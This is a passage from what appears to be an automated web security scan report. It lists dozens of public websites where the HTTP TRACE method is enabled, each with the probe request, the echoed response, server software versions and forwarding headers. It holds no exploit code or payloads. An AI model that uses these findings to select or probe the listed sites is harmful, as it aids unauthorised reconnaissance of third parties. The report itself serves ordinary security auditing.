TRACE / HTTP/1.0
Host: www.buzzfeed.com
Cookie: 107720d6e49e93dc
X-Forwarded-For: 173.193.214.243


21.37. http://www.buzzillions.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.buzzillions.com
Cookie: e0e8df497776aba7

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:30 GMT
Server: Apache/2.2.9 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.buzzillions.com
Cookie: e0e8df497776aba7


21.38. http://www.buzznet.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzznet.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.buzznet.com
Cookie: 41e2049772526b9e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:25 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: 41e2049772526b9e
Host: www.buzznet.com
X-Forwarded-For: 173.193.214.243


21.39. http://www.cafemom.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafemom.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cafemom.com
Cookie: dc8b620e9feda53b

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:28 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cafemom.com
Cookie: dc8b620e9feda53b


21.40. http://www.care2.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.care2.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.care2.com
Cookie: fc1ad76d2900744e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:23 GMT
Server: Apache/2.2.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.care2.com
Cookie: fc1ad76d2900744e
Connection: Keep-Alive
CLIENT-IP: 173.193.214.243


21.41. http://www.caringbridge.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caringbridge.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.caringbridge.org
Cookie: d7fe8f8bb7e415b7

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:06 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.caringbridge.org
Cookie: d7fe8f8bb7e415b7


21.42. http://www.cartoonnetwork.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cartoonnetwork.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cartoonnetwork.com
Cookie: c1482c64ce9a08d1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:47 GMT
Server: Apache
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: www.cartoonnetwork.com
Cookie: c1482c64ce9a08d1
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.cartoonnetwork.com
X-Forwarded-Server: www.cartoonnetwork.com
Connection: Keep-Alive


21.43. http://www.cdkitchen.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cdkitchen.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cdkitchen.com
Cookie: 250e5fde82f595fd

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) PHP/4.4.7 mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:35:54 GMT
Connection: close

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: 250e5fde82f595fd
Host: www.cdkitchen.com
X-Cluster-Client-Ip: 173.193.214.243


21.44. http://www.cheapstuff.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheapstuff.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cheapstuff.com
Cookie: 508009bfb3a43d94

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:35 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cheapstuff.com
Cookie: 508009bfb3a43d94


21.45. http://www.chuckecheese.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chuckecheese.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.chuckecheese.com
Cookie: c3d54326b29ef892

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.chuckecheese.com
Cookie: c3d54326b29ef892


21.46. http://www.cincinnati.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cincinnati.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cincinnati.com
Cookie: a816a41a0c4cb938

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cincinnati.com
Cookie: a816a41a0c4cb938


21.47. http://www.city-data.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.city-data.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.city-data.com
Cookie: 1ed27e99221e634b

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:11 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.city-data.com
Cookie: 1ed27e99221e634b


21.48. http://www.citygridmedia.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citygridmedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.citygridmedia.com
Cookie: d72fec8e25a014d4

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:11 GMT
Server: Apache/2.0.54
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.citygridmedia.com
Cookie: d72fec8e25a014d4


21.49. http://www.classesusa.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classesusa.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.classesusa.com
Cookie: 505da4002bb13a89

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:12 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerpl.eduprod=654581770.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.classesusa.com
Cookie: 505da4002bb13a89


21.50. http://www.classifiedads.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classifiedads.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.classifiedads.com
Cookie: b8fb1ebd68a49f9e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:42 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.classifiedads.com
Cookie: b8fb1ebd68a49f9e


21.51. http://www.clear-request.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clear-request.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.clear-request.com
Cookie: 1fe2596a396ac8a1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:15 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.clear-request.com
Cookie: 1fe2596a396ac8a1


21.52. http://www.clear.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clear.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.clear.com
Cookie: 2a52a95110a10184

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:04 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8r
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.clear.com
Cookie: 2a52a95110a10184


21.53. http://www.cliffsnotes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cliffsnotes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cliffsnotes.com
Cookie: fb6a57ce56c8fc46

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 14:09:25 GMT
Server: Apache
Content-Type: message/http
Connection: close

TRACE /WileyCDA// HTTP/1.0
Host: www.cliffsnotes.com
Cookie: fb6a57ce56c8fc46
Client-IP: 173.193.214.243, 208.215.179.221
Max-Forwards: 10
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.cliffsnotes.com
X-Forwarded-Server: www.cliffsnotes.com


21.54. http://www.clocklink.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clocklink.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.clocklink.com
Cookie: bbac553a0690ddfa

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:43 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.clocklink.com
Cookie: bbac553a0690ddfa


21.55. http://www.clubpenguin.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clubpenguin.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.clubpenguin.com
Cookie: 23494197b93f129

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:17 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.clubpenguin.com
Cookie: 23494197b93f129
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


21.56. http://www.clubtug.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clubtug.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.clubtug.com
Cookie: 7f034a1887d1c05b

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
Content-Length: 126
Date: Sat, 02 Apr 2011 14:05:48 GMT
X-Varnish: 1589848247
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Cookie: 7f034a1887d1c05b
host: www.clubtug.com
X-Forwarded-For: 173.193.214.243
X-Varnish: 1589848247


21.57. http://www.coldhardcash.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coldhardcash.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.coldhardcash.com
Cookie: 6127003b0ba6f66

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:23 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.coldhardcash.com
Cookie: 6127003b0ba6f66


21.58. http://www.collegeconfidential.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegeconfidential.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.collegeconfidential.com
Cookie: 9506f16d8448a0af

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:55 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerims_ccinfo_pool=3298375690.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.collegeconfidential.com
Cookie: 9506f16d8448a0af
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


21.59. http://www.consumeraffairs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.consumeraffairs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.consumeraffairs.com
Cookie: 2504b2113335bec9

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:08 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.consumeraffairs.com
Cookie: 2504b2113335bec9


21.60. http://www.contactmusic.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contactmusic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.contactmusic.com
Cookie: 3dffef939ad54752

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:37 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
Set-Cookie: wwwSERVERID=c2; path=/
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Tue, 31 Dec 2019 12:34:56 GMT
x-cdn: CMcdn
Connection: close

TRACE / HTTP/1.1
Cookie: 3dffef939ad54752
Accept-Encoding: gzip
Host: www.contactmusic.com
X-Forwarded-For: 173.193.214.243, 208.93.140.21
x-chpd-loop: 1
Via: 1.0 PXY008-ASHB.COTENDO.NET (chpd/4.00.0134.3)
Connection: close


21.61. http://www.coolsavings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolsavings.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.coolsavings.com
Cookie: d8cc09fe09951e1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:28 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: d8cc09fe09951e1
Host: www.coolsavings.com


21.62. http://www.cornell.edu/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cornell.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cornell.edu
Cookie: ffbd5d1fa9ffef

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:20 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l JRun/4.0
Content-Type: message/http
Set-Cookie: BALANCEID=balancer.cf068; path=/; domain=.cornell.edu
Connection: close

TRACE / HTTP/1.1
Host: www.cornell.edu
Cookie: ffbd5d1fa9ffef
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.cornell.edu
X-Forwarded-Server: www.cornell.edu
Connection: Keep-Alive


21.63. http://www.couponmountain.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.couponmountain.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.couponmountain.com
Cookie: 38f8e569ea3801f1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:48 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.couponmountain.com
Cookie: 38f8e569ea3801f1
Connection: Keep-Alive
rlnclientipaddr: 173.193.214.243


21.64. http://www.cowboylyrics.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cowboylyrics.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cowboylyrics.com
Cookie: 902e39c9c40d30f5

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:07:59 GMT
Server: Apache/2.2.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cowboylyrics.com
Cookie: 902e39c9c40d30f5


21.65. http://www.cox.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cox.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cox.net
Cookie: dfadc1971560ce16

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:54 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cox.net
Cookie: dfadc1971560ce16
Connection: Keep-Alive


21.66. http://www.craveonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.craveonline.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.craveonline.com
Cookie: 3b7962d790c42219

Response

HTTP/1.1 200 OK
Server: Apache/2
Content-Type: message/http
Content-Length: 130
Date: Sat, 02 Apr 2011 14:19:13 GMT
X-Varnish: 1548710198
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS from pxy2v.sb.lax1

TRACE / HTTP/1.0
Host: www.craveonline.com
Cookie: 3b7962d790c42219
X-Varnish: 1548710198
X-Forwarded-For: 173.193.214.243


21.67. http://www.cyberdefender.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cyberdefender.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cyberdefender.com
Cookie: 8aec211e43860d57

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:26 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cyberdefender.com
Cookie: 8aec211e43860d57
Connection: Keep-Alive


21.68. http://www.cz.cc/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cz.cc
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cz.cc
Cookie: 5b5d0f9ae90013da

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cz.cc
Cookie: 5b5d0f9ae90013da


21.69. http://www.datpiff.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.datpiff.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.datpiff.com
Cookie: 900a5d883fe325f0

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:21 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.datpiff.com
Cookie: 900a5d883fe325f0


21.70. http://www.demdex.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.demdex.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.demdex.net
Cookie: da66f9aa96b08ce9

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:36 GMT
Server: Apache/2.2.10 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.demdex.net
Cookie: da66f9aa96b08ce9
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


21.71. http://www.detiva.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.detiva.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.detiva.com
Cookie: 76b938d3d1a81b07

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:49:38 GMT
Server: Apache/2.2.2 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.detiva.com
Cookie: 76b938d3d1a81b07


21.72. http://www.dmv.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dmv.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dmv.org
Cookie: 921e2f0b2f673f2a

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:43:22 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.dmv.org
X-Cluster-Client-Ip: 173.193.214.243
Cookie: 921e2f0b2f673f2a
Connection: Keep-Alive


21.73. http://www.domaingateway.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.domaingateway.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.domaingateway.com
Cookie: dbb806718f420462

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:00 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.domaingateway.com
Cookie: dbb806718f420462


21.74. http://www.doubleinks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doubleinks.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.doubleinks.com
Cookie: 74b9ae3b126d7c05

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.doubleinks.com
Cookie: 74b9ae3b126d7c05


21.75. http://www.driverside.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.driverside.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.driverside.com
Cookie: 14ddbebd852bdfa3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:00 GMT
Server: Apache/2.2.14 (EL)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.driverside.com
Cookie: 14ddbebd852bdfa3


21.76. http://www.driversquad.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.driversquad.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.driversquad.com
Cookie: 7d267a857fc12057

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:28 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.driversquad.com
Cookie: 7d267a857fc12057


21.77. http://www.droidforums.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.droidforums.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.droidforums.net
Cookie: 64f27224e1eb75ff

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:47 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.droidforums.net
Cookie: 64f27224e1eb75ff


21.78. http://www.eatingwell.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eatingwell.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.eatingwell.com
Cookie: 5b77edc9aefddca4

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:54 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.eatingwell.com
Cookie: 5b77edc9aefddca4


21.79. http://www.ebaumsworld.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebaumsworld.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ebaumsworld.com
Cookie: 278d8f10b40c635a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:31 GMT
Server: Apache/2.2.17 (EL)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ebaumsworld.com
Cookie: 278d8f10b40c635a
X-Forwarded-For: 173.193.214.243


21.80. http://www.economist.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.economist.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.economist.com
Cookie: 59ba752348253a96

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Content-Length: 184
Date: Sat, 02 Apr 2011 13:54:47 GMT
X-Varnish: 1459381535
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

TRACE / HTTP/1.0
Host: www.economist.com
Cookie: 59ba752348253a96
X-Real-Forwarded-For: 173.193.214.243, 173.193.214.243
X-Varnish: 1459381535
X-Forwarded-For: 173.193.214.243


21.81. http://www.egotastic.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.egotastic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.egotastic.com
Cookie: e59ee05b85dcdca0

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:58 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.egotastic.com
Cookie: e59ee05b85dcdca0
X-Forwarded-For: 173.193.214.243


21.82. http://www.ehealthforum.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ehealthforum.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ehealthforum.com
Cookie: 7f793e7b8c9ea201

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:03 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerehealthforum_POOL=3336900780.0.0000; path=/

TRACE / HTTP/1.0
Host: www.ehealthforum.com
Cookie: 7f793e7b8c9ea201
Connection: Keep-Alive


21.83. http://www.elyrics.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elyrics.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.elyrics.net
Cookie: 2546afeafc36fc88

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.elyrics.net
Cookie: 2546afeafc36fc88


21.84. http://www.elyricsworld.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.elyricsworld.com
Cookie: fb20fcb7d62898b3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 20:22:02 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.elyricsworld.com
Cookie: fb20fcb7d62898b3


21.85. http://www.emediatrack.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emediatrack.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.emediatrack.com
Cookie: 6ccc1680999db3f1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:52:27 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 73

TRACE / HTTP/1.0
Host: www.emediatrack.com
Cookie: 6ccc1680999db3f1


21.86. http://www.emedtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emedtv.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.emedtv.com
Cookie: 24acb178c118560d

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:55 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.emedtv.com
Cookie: 24acb178c118560d


21.87. http://www.engadget.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.engadget.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.engadget.com
Cookie: a888574bf445d227

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:33 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.engadget.com
Cookie: a888574bf445d227
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:20:9B09:200483,x-lb-client-ip:ajg_u


21.88. http://www.ezanga.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezanga.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ezanga.com
Cookie: dbdef3e805fad541

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:44 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ezanga.com
Cookie: dbdef3e805fad541


21.89. http://www.fantage.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fantage.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.fantage.com
Cookie: a81630fa32073ea2

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:51 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.fantage.com
Cookie: a81630fa32073ea2


21.90. http://www.faqs.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.faqs.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.faqs.org
Cookie: a11c00a79deadc57

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:36 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.faqs.org
Cookie: a11c00a79deadc57


21.91. http://www.fetedoris.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fetedoris.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.fetedoris.com
Cookie: 5af7a47a9a00c3e6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:36 GMT
Server: Apache/2.2.2 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.fetedoris.com
Cookie: 5af7a47a9a00c3e6


21.92. http://www.findagrave.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findagrave.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.findagrave.com
Cookie: 208edff39f5b7a0c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:26 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.findagrave.com
Cookie: 208edff39f5b7a0c


21.93. http://www.findlaw.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findlaw.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.findlaw.com
Cookie: 6723daeffb5bf741

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:29 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 6723daeffb5bf741
Host: www.findlaw.com


21.94. http://www.findlocaljobsnow.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findlocaljobsnow.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.findlocaljobsnow.com
Cookie: a553c0938697c719

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:21 GMT
